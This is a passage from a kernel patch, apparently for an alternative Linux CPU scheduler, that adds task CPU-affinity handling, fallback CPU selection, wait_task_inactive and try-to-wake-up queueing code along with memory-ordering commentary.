++	 * during wakeups, see set_cpus_allowed_ptr()'s TASK_WAKING test.
++	 */
++	flush_smp_call_function_queue();
++
++	raw_spin_lock(&p->pi_lock);
++	raw_spin_lock(&rq->lock);
++	/*
++	 * If task_rq(p) != rq, it cannot be migrated here, because we're
++	 * holding rq->lock, if p->on_rq == 0 it cannot get enqueued because
++	 * we're holding p->pi_lock.
++	 */
++	if (task_rq(p) == rq && task_on_rq_queued(p))
++		rq = __migrate_task(rq, p, arg->dest_cpu);
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++
++	return 0;
++}
++
++static inline void
++set_cpus_allowed_common(struct task_struct *p, const struct cpumask *new_mask)
++{
++	cpumask_copy(&p->cpus_mask, new_mask);
++	p->nr_cpus_allowed = cpumask_weight(new_mask);
++}
++
++static void
++__do_set_cpus_allowed(struct task_struct *p, const struct cpumask *new_mask)
++{
++	lockdep_assert_held(&p->pi_lock);
++	set_cpus_allowed_common(p, new_mask);
++}
++
++void do_set_cpus_allowed(struct task_struct *p, const struct cpumask *new_mask)
++{
++	__do_set_cpus_allowed(p, new_mask);
++}
++
++int dup_user_cpus_ptr(struct task_struct *dst, struct task_struct *src,
++		      int node)
++{
++	if (!src->user_cpus_ptr)
++		return 0;
++
++	dst->user_cpus_ptr = kmalloc_node(cpumask_size(), GFP_KERNEL, node);
++	if (!dst->user_cpus_ptr)
++		return -ENOMEM;
++
++	cpumask_copy(dst->user_cpus_ptr, src->user_cpus_ptr);
++	return 0;
++}
++
++static inline struct cpumask *clear_user_cpus_ptr(struct task_struct *p)
++{
++	struct cpumask *user_mask = NULL;
++
++	swap(p->user_cpus_ptr, user_mask);
++
++	return user_mask;
++}
++
++void release_user_cpus_ptr(struct task_struct *p)
++{
++	kfree(clear_user_cpus_ptr(p));
++}
++
++#endif
++
++/**
++ * task_curr - is this task currently executing on a CPU?
++ * @p: the task in question.
++ *
++ * Return: 1 if the task is currently executing. 0 otherwise.
++ */
++inline int task_curr(const struct task_struct *p)
++{
++	return cpu_curr(task_cpu(p)) == p;
++}
++
++#ifdef CONFIG_SMP
++/*
++ * wait_task_inactive - wait for a thread to unschedule.
++ *
++ * Wait for the thread to block in any of the states set in @match_state.
++ * If it changes, i.e. @p might have woken up, then return zero.  When we
++ * succeed in waiting for @p to be off its CPU, we return a positive number
++ * (its total switch count).  If a second call a short while later returns the
++ * same number, the caller can be sure that @p has remained unscheduled the
++ * whole time.
++ *
++ * The caller must ensure that the task *will* unschedule sometime soon,
++ * else this function might spin for a *long* time. This function can't
++ * be called with interrupts off, or it may introduce deadlock with
++ * smp_call_function() if an IPI is sent by the same process we are
++ * waiting to become inactive.
++ */
++unsigned long wait_task_inactive(struct task_struct *p, unsigned int match_state)
++{
++	unsigned long flags;
++	bool running, on_rq;
++	unsigned long ncsw;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++
++	for (;;) {
++		rq = task_rq(p);
++
++		/*
++		 * If the task is actively running on another CPU
++		 * still, just relax and busy-wait without holding
++		 * any locks.
++		 *
++		 * NOTE! Since we don't hold any locks, it's not
++		 * even sure that "rq" stays as the right runqueue!
++		 * But we don't care, since this will return false
++		 * if the runqueue has changed and p is actually now
++		 * running somewhere else!
++		 */
++		while (task_on_cpu(p) && p == rq->curr) {
++			if (!(READ_ONCE(p->__state) & match_state))
++				return 0;
++			cpu_relax();
++		}
++
++		/*
++		 * Ok, time to look more closely! We need the rq
++		 * lock now, to be *sure*. If we're wrong, we'll
++		 * just go back and repeat.
++		 */
++		task_access_lock_irqsave(p, &lock, &flags);
++		trace_sched_wait_task(p);
++		running = task_on_cpu(p);
++		on_rq = p->on_rq;
++		ncsw = 0;
++		if (READ_ONCE(p->__state) & match_state)
++			ncsw = p->nvcsw | LONG_MIN; /* sets MSB */
++		task_access_unlock_irqrestore(p, lock, &flags);
++
++		/*
++		 * If it changed from the expected state, bail out now.
++		 */
++		if (unlikely(!ncsw))
++			break;
++
++		/*
++		 * Was it really running after all now that we
++		 * checked with the proper locks actually held?
++		 *
++		 * Oops. Go back and try again..
++		 */
++		if (unlikely(running)) {
++			cpu_relax();
++			continue;
++		}
++
++		/*
++		 * It's not enough that it's not actively running,
++		 * it must be off the runqueue _entirely_, and not
++		 * preempted!
++		 *
++		 * So if it was still runnable (but just not actively
++		 * running right now), it's preempted, and we should
++		 * yield - it could be a while.
++		 */
++		if (unlikely(on_rq)) {
++			ktime_t to = NSEC_PER_SEC / HZ;
++
++			set_current_state(TASK_UNINTERRUPTIBLE);
++			schedule_hrtimeout(&to, HRTIMER_MODE_REL_HARD);
++			continue;
++		}
++
++		/*
++		 * Ahh, all good. It wasn't running, and it wasn't
++		 * runnable, which means that it will never become
++		 * running in the future either. We're all done!
++		 */
++		break;
++	}
++
++	return ncsw;
++}
++
++/***
++ * kick_process - kick a running thread to enter/exit the kernel
++ * @p: the to-be-kicked thread
++ *
++ * Cause a process which is running on another CPU to enter
++ * kernel-mode, without any delay. (to get signals handled.)
++ *
++ * NOTE: this function doesn't have to take the runqueue lock,
++ * because all it wants to ensure is that the remote task enters
++ * the kernel. If the IPI races and the task has been migrated
++ * to another CPU then no harm is done and the purpose has been
++ * achieved as well.
++ */
++void kick_process(struct task_struct *p)
++{
++	int cpu;
++
++	preempt_disable();
++	cpu = task_cpu(p);
++	if ((cpu != smp_processor_id()) && task_curr(p))
++		smp_send_reschedule(cpu);
++	preempt_enable();
++}
++EXPORT_SYMBOL_GPL(kick_process);
++
++/*
++ * ->cpus_ptr is protected by both rq->lock and p->pi_lock
++ *
++ * A few notes on cpu_active vs cpu_online:
++ *
++ *  - cpu_active must be a subset of cpu_online
++ *
++ *  - on CPU-up we allow per-CPU kthreads on the online && !active CPU,
++ *    see __set_cpus_allowed_ptr(). At this point the newly online
++ *    CPU isn't yet part of the sched domains, and balancing will not
++ *    see it.
++ *
++ *  - on cpu-down we clear cpu_active() to mask the sched domains and
++ *    avoid the load balancer to place new tasks on the to be removed
++ *    CPU. Existing tasks will remain running there and will be taken
++ *    off.
++ *
++ * This means that fallback selection must not select !active CPUs.
++ * And can assume that any active CPU must be online. Conversely
++ * select_task_rq() below may allow selection of !active CPUs in order
++ * to satisfy the above rules.
++ */
++static int select_fallback_rq(int cpu, struct task_struct *p)
++{
++	int nid = cpu_to_node(cpu);
++	const struct cpumask *nodemask = NULL;
++	enum { cpuset, possible, fail } state = cpuset;
++	int dest_cpu;
++
++	/*
++	 * If the node that the CPU is on has been offlined, cpu_to_node()
++	 * will return -1. There is no CPU on the node, and we should
++	 * select the CPU on the other node.
++	 */
++	if (nid != -1) {
++		nodemask = cpumask_of_node(nid);
++
++		/* Look for allowed, online CPU in same node. */
++		for_each_cpu(dest_cpu, nodemask) {
++			if (is_cpu_allowed(p, dest_cpu))
++				return dest_cpu;
++		}
++	}
++
++	for (;;) {
++		/* Any allowed, online CPU? */
++		for_each_cpu(dest_cpu, p->cpus_ptr) {
++			if (!is_cpu_allowed(p, dest_cpu))
++				continue;
++			goto out;
++		}
++
++		/* No more Mr. Nice Guy. */
++		switch (state) {
++		case cpuset:
++			if (cpuset_cpus_allowed_fallback(p)) {
++				state = possible;
++				break;
++			}
++			fallthrough;
++		case possible:
++			/*
++			 * XXX When called from select_task_rq() we only
++			 * hold p->pi_lock and again violate locking order.
++			 *
++			 * More yuck to audit.
++			 */
++			do_set_cpus_allowed(p, task_cpu_possible_mask(p));
++			state = fail;
++			break;
++
++		case fail:
++			BUG();
++			break;
++		}
++	}
++
++out:
++	if (state != cpuset) {
++		/*
++		 * Don't tell them about moving exiting tasks or
++		 * kernel threads (both mm NULL), since they never
++		 * leave kernel.
++		 */
++		if (p->mm && printk_ratelimit()) {
++			printk_deferred("process %d (%s) no longer affine to cpu%d\n",
++					task_pid_nr(p), p->comm, cpu);
++		}
++	}
++
++	return dest_cpu;
++}
++
++static inline int select_task_rq(struct task_struct *p)
++{
++	cpumask_t chk_mask, tmp;
++
++	if (unlikely(!cpumask_and(&chk_mask, p->cpus_ptr, cpu_active_mask)))
++		return select_fallback_rq(task_cpu(p), p);
++
++	if (
++#ifdef CONFIG_SCHED_SMT
++	    cpumask_and(&tmp, &chk_mask, &sched_sg_idle_mask) ||
++#endif
++	    cpumask_and(&tmp, &chk_mask, sched_rq_watermark) ||
++	    cpumask_and(&tmp, &chk_mask,
++			sched_rq_watermark + SCHED_QUEUE_BITS - 1 - task_sched_prio(p)))
++		return best_mask_cpu(task_cpu(p), &tmp);
++
++	return best_mask_cpu(task_cpu(p), &chk_mask);
++}
++
++void sched_set_stop_task(int cpu, struct task_struct *stop)
++{
++	static struct lock_class_key stop_pi_lock;
++	struct sched_param stop_param = { .sched_priority = STOP_PRIO };
++	struct sched_param start_param = { .sched_priority = 0 };
++	struct task_struct *old_stop = cpu_rq(cpu)->stop;
++
++	if (stop) {
++		/*
++		 * Make it appear like a SCHED_FIFO task, its something
++		 * userspace knows about and won't get confused about.
++		 *
++		 * Also, it will make PI more or less work without too
++		 * much confusion -- but then, stop work should not
++		 * rely on PI working anyway.
++		 */
++		sched_setscheduler_nocheck(stop, SCHED_FIFO, &stop_param);
++
++		/*
++		 * The PI code calls rt_mutex_setprio() with ->pi_lock held to
++		 * adjust the effective priority of a task. As a result,
++		 * rt_mutex_setprio() can trigger (RT) balancing operations,
++		 * which can then trigger wakeups of the stop thread to push
++		 * around the current task.
++		 *
++		 * The stop task itself will never be part of the PI-chain, it
++		 * never blocks, therefore that ->pi_lock recursion is safe.
++		 * Tell lockdep about this by placing the stop->pi_lock in its
++		 * own class.
++		 */
++		lockdep_set_class(&stop->pi_lock, &stop_pi_lock);
++	}
++
++	cpu_rq(cpu)->stop = stop;
++
++	if (old_stop) {
++		/*
++		 * Reset it back to a normal scheduling policy so that
++		 * it can die in pieces.
++		 */
++		sched_setscheduler_nocheck(old_stop, SCHED_NORMAL, &start_param);
++	}
++}
++
++static int affine_move_task(struct rq *rq, struct task_struct *p, int dest_cpu,
++			    raw_spinlock_t *lock, unsigned long irq_flags)
++{
++	/* Can the task run on the task's current CPU? If so, we're done */
++	if (!cpumask_test_cpu(task_cpu(p), &p->cpus_mask)) {
++		if (p->migration_disabled) {
++			if (likely(p->cpus_ptr != &p->cpus_mask))
++				__do_set_cpus_ptr(p, &p->cpus_mask);
++			p->migration_disabled = 0;
++			p->migration_flags |= MDF_FORCE_ENABLED;
++			/* When p is migrate_disabled, rq->lock should be held */
++			rq->nr_pinned--;
++		}
++
++		if (task_on_cpu(p) || READ_ONCE(p->__state) == TASK_WAKING) {
++			struct migration_arg arg = { p, dest_cpu };
++
++			/* Need help from migration thread: drop lock and wait. */
++			__task_access_unlock(p, lock);
++			raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
++			stop_one_cpu(cpu_of(rq), migration_cpu_stop, &arg);
++			return 0;
++		}
++		if (task_on_rq_queued(p)) {
++			/*
++			 * OK, since we're going to drop the lock immediately
++			 * afterwards anyway.
++			 */
++			update_rq_clock(rq);
++			rq = move_queued_task(rq, p, dest_cpu);
++			lock = &rq->lock;
++		}
++	}
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
++	return 0;
++}
++
++static int __set_cpus_allowed_ptr_locked(struct task_struct *p,
++					 const struct cpumask *new_mask,
++					 u32 flags,
++					 struct rq *rq,
++					 raw_spinlock_t *lock,
++					 unsigned long irq_flags)
++{
++	const struct cpumask *cpu_allowed_mask = task_cpu_possible_mask(p);
++	const struct cpumask *cpu_valid_mask = cpu_active_mask;
++	bool kthread = p->flags & PF_KTHREAD;
++	struct cpumask *user_mask = NULL;
++	int dest_cpu;
++	int ret = 0;
++
++	if (kthread || is_migration_disabled(p)) {
++		/*
++		 * Kernel threads are allowed on online && !active CPUs,
++		 * however, during cpu-hot-unplug, even these might get pushed
++		 * away if not KTHREAD_IS_PER_CPU.
++		 *
++		 * Specifically, migration_disabled() tasks must not fail the
++		 * cpumask_any_and_distribute() pick below, esp. so on
++		 * SCA_MIGRATE_ENABLE, otherwise we'll not call
++		 * set_cpus_allowed_common() and actually reset p->cpus_ptr.
++		 */
++		cpu_valid_mask = cpu_online_mask;
++	}
++
++	if (!kthread && !cpumask_subset(new_mask, cpu_allowed_mask)) {
++		ret = -EINVAL;
++		goto out;
++	}
++
++	/*
++	 * Must re-check here, to close a race against __kthread_bind(),
++	 * sched_setaffinity() is not guaranteed to observe the flag.
++	 */
++	if ((flags & SCA_CHECK) && (p->flags & PF_NO_SETAFFINITY)) {
++		ret = -EINVAL;
++		goto out;
++	}
++
++	if (cpumask_equal(&p->cpus_mask, new_mask))
++		goto out;
++
++	dest_cpu = cpumask_any_and(cpu_valid_mask, new_mask);
++	if (dest_cpu >= nr_cpu_ids) {
++		ret = -EINVAL;
++		goto out;
++	}
++
++	__do_set_cpus_allowed(p, new_mask);
++
++	if (flags & SCA_USER)
++		user_mask = clear_user_cpus_ptr(p);
++
++	ret = affine_move_task(rq, p, dest_cpu, lock, irq_flags);
++
++	kfree(user_mask);
++
++	return ret;
++
++out:
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
++
++	return ret;
++}
++
++/*
++ * Change a given task's CPU affinity. Migrate the thread to a
++ * proper CPU and schedule it away if the CPU it's executing on
++ * is removed from the allowed bitmask.
++ *
++ * NOTE: the caller must have a valid reference to the task, the
++ * task must not exit() & deallocate itself prematurely. The
++ * call is not atomic; no spinlocks may be held.
++ */
++static int __set_cpus_allowed_ptr(struct task_struct *p,
++				  const struct cpumask *new_mask, u32 flags)
++{
++	unsigned long irq_flags;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++
++	raw_spin_lock_irqsave(&p->pi_lock, irq_flags);
++	rq = __task_access_lock(p, &lock);
++
++	return __set_cpus_allowed_ptr_locked(p, new_mask, flags, rq, lock, irq_flags);
++}
++
++int set_cpus_allowed_ptr(struct task_struct *p, const struct cpumask *new_mask)
++{
++	return __set_cpus_allowed_ptr(p, new_mask, 0);
++}
++EXPORT_SYMBOL_GPL(set_cpus_allowed_ptr);
++
++/*
++ * Change a given task's CPU affinity to the intersection of its current
++ * affinity mask and @subset_mask, writing the resulting mask to @new_mask
++ * and pointing @p->user_cpus_ptr to a copy of the old mask.
++ * If the resulting mask is empty, leave the affinity unchanged and return
++ * -EINVAL.
++ */
++static int restrict_cpus_allowed_ptr(struct task_struct *p,
++				     struct cpumask *new_mask,
++				     const struct cpumask *subset_mask)
++{
++	struct cpumask *user_mask = NULL;
++	unsigned long irq_flags;
++	raw_spinlock_t *lock;
++	struct rq *rq;
++	int err;
++
++	if (!p->user_cpus_ptr) {
++		user_mask = kmalloc(cpumask_size(), GFP_KERNEL);
++		if (!user_mask)
++			return -ENOMEM;
++	}
++
++	raw_spin_lock_irqsave(&p->pi_lock, irq_flags);
++	rq = __task_access_lock(p, &lock);
++
++	if (!cpumask_and(new_mask, &p->cpus_mask, subset_mask)) {
++		err = -EINVAL;
++		goto err_unlock;
++	}
++
++	/*
++	 * We're about to butcher the task affinity, so keep track of what
++	 * the user asked for in case we're able to restore it later on.
++	 */
++	if (user_mask) {
++		cpumask_copy(user_mask, p->cpus_ptr);
++		p->user_cpus_ptr = user_mask;
++	}
++
++	/*return __set_cpus_allowed_ptr_locked(p, new_mask, 0, rq, &rf);*/
++	return __set_cpus_allowed_ptr_locked(p, new_mask, 0, rq, lock, irq_flags);
++
++err_unlock:
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
++	kfree(user_mask);
++	return err;
++}
++
++/*
++ * Restrict the CPU affinity of task @p so that it is a subset of
++ * task_cpu_possible_mask() and point @p->user_cpu_ptr to a copy of the
++ * old affinity mask. If the resulting mask is empty, we warn and walk
++ * up the cpuset hierarchy until we find a suitable mask.
++ */
++void force_compatible_cpus_allowed_ptr(struct task_struct *p)
++{
++	cpumask_var_t new_mask;
++	const struct cpumask *override_mask = task_cpu_possible_mask(p);
++
++	alloc_cpumask_var(&new_mask, GFP_KERNEL);
++
++	/*
++	 * __migrate_task() can fail silently in the face of concurrent
++	 * offlining of the chosen destination CPU, so take the hotplug
++	 * lock to ensure that the migration succeeds.
++	 */
++	cpus_read_lock();
++	if (!cpumask_available(new_mask))
++		goto out_set_mask;
++
++	if (!restrict_cpus_allowed_ptr(p, new_mask, override_mask))
++		goto out_free_mask;
++
++	/*
++	 * We failed to find a valid subset of the affinity mask for the
++	 * task, so override it based on its cpuset hierarchy.
++	 */
++	cpuset_cpus_allowed(p, new_mask);
++	override_mask = new_mask;
++
++out_set_mask:
++	if (printk_ratelimit()) {
++		printk_deferred("Overriding affinity for process %d (%s) to CPUs %*pbl\n",
++				task_pid_nr(p), p->comm,
++				cpumask_pr_args(override_mask));
++	}
++
++	WARN_ON(set_cpus_allowed_ptr(p, override_mask));
++out_free_mask:
++	cpus_read_unlock();
++	free_cpumask_var(new_mask);
++}
++
++static int
++__sched_setaffinity(struct task_struct *p, const struct cpumask *mask);
++
++/*
++ * Restore the affinity of a task @p which was previously restricted by a
++ * call to force_compatible_cpus_allowed_ptr(). This will clear (and free)
++ * @p->user_cpus_ptr.
++ *
++ * It is the caller's responsibility to serialise this with any calls to
++ * force_compatible_cpus_allowed_ptr(@p).
++ */
++void relax_compatible_cpus_allowed_ptr(struct task_struct *p)
++{
++	struct cpumask *user_mask = p->user_cpus_ptr;
++	unsigned long flags;
++
++	/*
++	 * Try to restore the old affinity mask. If this fails, then
++	 * we free the mask explicitly to avoid it being inherited across
++	 * a subsequent fork().
++	 */
++	if (!user_mask || !__sched_setaffinity(p, user_mask))
++		return;
++
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++	user_mask = clear_user_cpus_ptr(p);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++
++	kfree(user_mask);
++}
++
++#else /* CONFIG_SMP */
++
++static inline int select_task_rq(struct task_struct *p)
++{
++	return 0;
++}
++
++static inline int
++__set_cpus_allowed_ptr(struct task_struct *p,
++		       const struct cpumask *new_mask, u32 flags)
++{
++	return set_cpus_allowed_ptr(p, new_mask);
++}
++
++static inline bool rq_has_pinned_tasks(struct rq *rq)
++{
++	return false;
++}
++
++#endif /* !CONFIG_SMP */
++
++static void
++ttwu_stat(struct task_struct *p, int cpu, int wake_flags)
++{
++	struct rq *rq;
++
++	if (!schedstat_enabled())
++		return;
++
++	rq = this_rq();
++
++#ifdef CONFIG_SMP
++	if (cpu == rq->cpu) {
++		__schedstat_inc(rq->ttwu_local);
++		__schedstat_inc(p->stats.nr_wakeups_local);
++	} else {
++		/** Alt schedule FW ToDo:
++		 * How to do ttwu_wake_remote
++		 */
++	}
++#endif /* CONFIG_SMP */
++
++	__schedstat_inc(rq->ttwu_count);
++	__schedstat_inc(p->stats.nr_wakeups);
++}
++
++/*
++ * Mark the task runnable and perform wakeup-preemption.
++ */
++static inline void
++ttwu_do_wakeup(struct rq *rq, struct task_struct *p, int wake_flags)
++{
++	check_preempt_curr(rq);
++	WRITE_ONCE(p->__state, TASK_RUNNING);
++	trace_sched_wakeup(p);
++}
++
++static inline void
++ttwu_do_activate(struct rq *rq, struct task_struct *p, int wake_flags)
++{
++	if (p->sched_contributes_to_load)
++		rq->nr_uninterruptible--;
++
++	if (
++#ifdef CONFIG_SMP
++	    !(wake_flags & WF_MIGRATED) &&
++#endif
++	    p->in_iowait) {
++		delayacct_blkio_end(p);
++		atomic_dec(&task_rq(p)->nr_iowait);
++	}
++
++	activate_task(p, rq);
++	ttwu_do_wakeup(rq, p, 0);
++}
++
++/*
++ * Consider @p being inside a wait loop:
++ *
++ *   for (;;) {
++ *      set_current_state(TASK_UNINTERRUPTIBLE);
++ *
++ *      if (CONDITION)
++ *         break;
++ *
++ *      schedule();
++ *   }
++ *   __set_current_state(TASK_RUNNING);
++ *
++ * between set_current_state() and schedule(). In this case @p is still
++ * runnable, so all that needs doing is change p->state back to TASK_RUNNING in
++ * an atomic manner.
++ *
++ * By taking task_rq(p)->lock we serialize against schedule(), if @p->on_rq
++ * then schedule() must still happen and p->state can be changed to
++ * TASK_RUNNING. Otherwise we lost the race, schedule() has happened, and we
++ * need to do a full wakeup with enqueue.
++ *
++ * Returns: %true when the wakeup is done,
++ *          %false otherwise.
++ */
++static int ttwu_runnable(struct task_struct *p, int wake_flags)
++{
++	struct rq *rq;
++	raw_spinlock_t *lock;
++	int ret = 0;
++
++	rq = __task_access_lock(p, &lock);
++	if (task_on_rq_queued(p)) {
++		/* check_preempt_curr() may use rq clock */
++		update_rq_clock(rq);
++		ttwu_do_wakeup(rq, p, wake_flags);
++		ret = 1;
++	}
++	__task_access_unlock(p, lock);
++
++	return ret;
++}
++
++#ifdef CONFIG_SMP
++void sched_ttwu_pending(void *arg)
++{
++	struct llist_node *llist = arg;
++	struct rq *rq = this_rq();
++	struct task_struct *p, *t;
++	struct rq_flags rf;
++
++	if (!llist)
++		return;
++
++	/*
++	 * rq::ttwu_pending racy indication of out-standing wakeups.
++	 * Races such that false-negatives are possible, since they
++	 * are shorter lived that false-positives would be.
++	 */
++	WRITE_ONCE(rq->ttwu_pending, 0);
++
++	rq_lock_irqsave(rq, &rf);
++	update_rq_clock(rq);
++
++	llist_for_each_entry_safe(p, t, llist, wake_entry.llist) {
++		if (WARN_ON_ONCE(p->on_cpu))
++			smp_cond_load_acquire(&p->on_cpu, !VAL);
++
++		if (WARN_ON_ONCE(task_cpu(p) != cpu_of(rq)))
++			set_task_cpu(p, cpu_of(rq));
++
++		ttwu_do_activate(rq, p, p->sched_remote_wakeup ? WF_MIGRATED : 0);
++	}
++
++	rq_unlock_irqrestore(rq, &rf);
++}
++
++void send_call_function_single_ipi(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	if (!set_nr_if_polling(rq->idle))
++		arch_send_call_function_single_ipi(cpu);
++	else
++		trace_sched_wake_idle_without_ipi(cpu);
++}
++
++/*
++ * Queue a task on the target CPUs wake_list and wake the CPU via IPI if
++ * necessary. The wakee CPU on receipt of the IPI will queue the task
++ * via sched_ttwu_wakeup() for activation so the wakee incurs the cost
++ * of the wakeup instead of the waker.
++ */
++static void __ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	p->sched_remote_wakeup = !!(wake_flags & WF_MIGRATED);
++
++	WRITE_ONCE(rq->ttwu_pending, 1);
++	__smp_call_single_queue(cpu, &p->wake_entry.llist);
++}
++
++static inline bool ttwu_queue_cond(struct task_struct *p, int cpu)
++{
++	/*
++	 * Do not complicate things with the async wake_list while the CPU is
++	 * in hotplug state.
++	 */
++	if (!cpu_active(cpu))
++		return false;
++
++	/* Ensure the task will still be allowed to run on the CPU. */
++	if (!cpumask_test_cpu(cpu, p->cpus_ptr))
++		return false;
++
++	/*
++	 * If the CPU does not share cache, then queue the task on the
++	 * remote rqs wakelist to avoid accessing remote data.
++	 */
++	if (!cpus_share_cache(smp_processor_id(), cpu))
++		return true;
++
++	if (cpu == smp_processor_id())
++		return false;
++
++	/*
++	 * If the wakee cpu is idle, or the task is descheduling and the
++	 * only running task on the CPU, then use the wakelist to offload
++	 * the task activation to the idle (or soon-to-be-idle) CPU as
++	 * the current CPU is likely busy. nr_running is checked to
++	 * avoid unnecessary task stacking.
++	 *
++	 * Note that we can only get here with (wakee) p->on_rq=0,
++	 * p->on_cpu can be whatever, we've done the dequeue, so
++	 * the wakee has been accounted out of ->nr_running.
++	 */
++	if (!cpu_rq(cpu)->nr_running)
++		return true;
++
++	return false;
++}
++
++static bool ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
++{
++	if (__is_defined(ALT_SCHED_TTWU_QUEUE) && ttwu_queue_cond(p, cpu)) {
++		sched_clock_cpu(cpu); /* Sync clocks across CPUs */
++		__ttwu_queue_wakelist(p, cpu, wake_flags);
++		return true;
++	}
++
++	return false;
++}
++
++void wake_up_if_idle(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
++	rcu_read_lock();
++
++	if (!is_idle_task(rcu_dereference(rq->curr)))
++		goto out;
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	if (is_idle_task(rq->curr))
++		resched_curr(rq);
++	/* Else CPU is not idle, do nothing here */
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++out:
++	rcu_read_unlock();
++}
++
++bool cpus_share_cache(int this_cpu, int that_cpu)
++{
++	if (this_cpu == that_cpu)
++		return true;
++
++	return per_cpu(sd_llc_id, this_cpu) == per_cpu(sd_llc_id, that_cpu);
++}
++#else /* !CONFIG_SMP */
++
++static inline bool ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
++{
++	return false;
++}
++
++#endif /* CONFIG_SMP */
++
++static inline void ttwu_queue(struct task_struct *p, int cpu, int wake_flags)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	if (ttwu_queue_wakelist(p, cpu, wake_flags))
++		return;
++
++	raw_spin_lock(&rq->lock);
++	update_rq_clock(rq);
++	ttwu_do_activate(rq, p, wake_flags);
++	raw_spin_unlock(&rq->lock);
++}
++
++/*
++ * Invoked from try_to_wake_up() to check whether the task can be woken up.
++ *
++ * The caller holds p::pi_lock if p != current or has preemption
++ * disabled when p == current.
++ *
++ * The rules of PREEMPT_RT saved_state:
++ *
++ *   The related locking code always holds p::pi_lock when updating
++ *   p::saved_state, which means the code is fully serialized in both cases.
++ *
++ *   The lock wait and lock wakeups happen via TASK_RTLOCK_WAIT. No other
++ *   bits set. This allows to distinguish all wakeup scenarios.
++ */
++static __always_inline
++bool ttwu_state_match(struct task_struct *p, unsigned int state, int *success)
++{
++	if (IS_ENABLED(CONFIG_DEBUG_PREEMPT)) {
++		WARN_ON_ONCE((state & TASK_RTLOCK_WAIT) &&
++			     state != TASK_RTLOCK_WAIT);
++	}
++
++	if (READ_ONCE(p->__state) & state) {
++		*success = 1;
++		return true;
++	}
++
++#ifdef CONFIG_PREEMPT_RT
++	/*
++	 * Saved state preserves the task state across blocking on
++	 * an RT lock.  If the state matches, set p::saved_state to
++	 * TASK_RUNNING, but do not wake the task because it waits
++	 * for a lock wakeup. Also indicate success because from
++	 * the regular waker's point of view this has succeeded.
++	 *
++	 * After acquiring the lock the task will restore p::__state
++	 * from p::saved_state which ensures that the regular
++	 * wakeup is not lost. The restore will also set
++	 * p::saved_state to TASK_RUNNING so any further tests will
++	 * not result in false positives vs. @success
++	 */
++	if (p->saved_state & state) {
++		p->saved_state = TASK_RUNNING;
++		*success = 1;
++	}
++#endif
++	return false;
++}
++
++/*
++ * Notes on Program-Order guarantees on SMP systems.
++ *
++ *  MIGRATION
++ *
++ * The basic program-order guarantee on SMP systems is that when a task [t]
++ * migrates, all its activity on its old CPU [c0] happens-before any subsequent
++ * execution on its new CPU [c1].
++ *
++ * For migration (of runnable tasks) this is provided by the following means:
++ *
++ *  A) UNLOCK of the rq(c0)->lock scheduling out task t
++ *  B) migration for t is required to synchronize *both* rq(c0)->lock and
++ *     rq(c1)->lock (if not at the same time, then in that order).
++ *  C) LOCK of the rq(c1)->lock scheduling in task
++ *
++ * Transitivity guarantees that B happens after A and C after B.
++ * Note: we only require RCpc transitivity.
++ * Note: the CPU doing B need not be c0 or c1
++ *
++ * Example:
++ *
++ *   CPU0            CPU1            CPU2
++ *
++ *   LOCK rq(0)->lock
++ *   sched-out X
++ *   sched-in Y
++ *   UNLOCK rq(0)->lock
++ *
++ *                                   LOCK rq(0)->lock // orders against CPU0
++ *                                   dequeue X
++ *                                   UNLOCK rq(0)->lock
++ *
++ *                                   LOCK rq(1)->lock
++ *                                   enqueue X
++ *                                   UNLOCK rq(1)->lock
++ *
++ *                   LOCK rq(1)->lock // orders against CPU2
++ *                   sched-out Z
++ *                   sched-in X
++ *                   UNLOCK rq(1)->lock
++ *
++ *
++ *  BLOCKING -- aka. SLEEP + WAKEUP
++ *
++ * For blocking we (obviously) need to provide the same guarantee as for
++ * migration. However the means are completely different as there is no lock
++ * chain to provide order. Instead we do:
++ *
++ *   1) smp_store_release(X->on_cpu, 0)   -- finish_task()
++ *   2) smp_cond_load_acquire(!X->on_cpu) -- try_to_wake_up()
++ *
++ * Example:
++ *
++ *   CPU0 (schedule)  CPU1 (try_to_wake_up) CPU2 (schedule)
++ *
++ *   LOCK rq(0)->lock LOCK X->pi_lock
++ *   dequeue X
++ *   sched-out X
++ *   smp_store_release(X->on_cpu, 0);
++ *
++ *                    smp_cond_load_acquire(&X->on_cpu, !VAL);
++ *                    X->state = WAKING
++ *                    set_task_cpu(X,2)
++ *
++ *                    LOCK rq(2)->lock
++ *                    enqueue X
++ *                    X->state = RUNNING
++ *                    UNLOCK rq(2)->lock
++ *
++ *                                          LOCK rq(2)->lock // orders against CPU1
++ *                                          sched-out Z
++ *                                          sched-in X
++ *                                          UNLOCK rq(2)->lock
++ *
++ *                    UNLOCK X->pi_lock
++ *   UNLOCK rq(0)->lock
++ *
++ *
++ * However; for wakeups there is a second guarantee we must provide, namely we
++ * must observe the state that lead to our wakeup. That is, not only must our
++ * task observe its own prior state, it must also observe the stores prior to
++ * its wakeup.
++ *
++ * This means that any means of doing remote wakeups must order the CPU doing
++ * the wakeup against the CPU the task is going to end up running on. This,
++ * however, is already required for the regular Program-Order guarantee above,
++ * since the waking CPU is the one issueing the ACQUIRE (smp_cond_load_acquire).
++ *
++ */
++
++/**
++ * try_to_wake_up - wake up a thread
++ * @p: the thread to be awakened
++ * @state: the mask of task states that can be woken
++ * @wake_flags: wake modifier flags (WF_*)
++ *
++ * Conceptually does:
++ *
++ *   If (@state & @p->state) @p->state = TASK_RUNNING.
++ *
